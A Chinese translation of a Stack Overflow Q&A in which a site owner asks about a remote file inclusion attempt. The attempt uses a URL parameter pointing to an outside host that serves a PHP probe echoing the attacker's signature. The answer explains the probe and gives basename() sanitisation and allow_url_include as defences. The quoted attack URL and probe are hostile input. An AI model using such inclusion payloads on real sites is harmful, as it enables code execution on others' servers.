一个叫 ShiroHige 的人正试图入侵我的网站。
他尝试使用此参数打开页面:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
如果您查看该文本文件,它只是一个 die()
,
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
那么他想利用什么漏洞(WordPress?)?
编辑1:
我知道他正在尝试使用 RFI .
是否有一些流行的脚本可以利用它(Drupal、phpBB 等)?
最佳答案
很明显的一个,只是未经 sanitizer 的包含。
他正在检查代码是否被执行。
如果他在响应中找到他的签名,他就会知道您的站点已准备好运行他发送的任何代码。
为了防止此类攻击,如果文件名碰巧是通过 HTTP 请求发送的,则必须严格清理文件名。
可以使用basename()
函数完成快速且廉价的验证:
if (empty($_GET['page']))
$_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
header("HTTP/1.0 404 Not Found");
$page="404.html";
}
include $page;
或者使用一些正则表达式。
还有一个非常有用的 PHP 配置指令,称为
allow_url_include
在现代 PHP 版本中默认设置为 off
。因此它会自动保护您免受此类攻击。
关于php - 该黑客想要利用什么漏洞?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/5613664/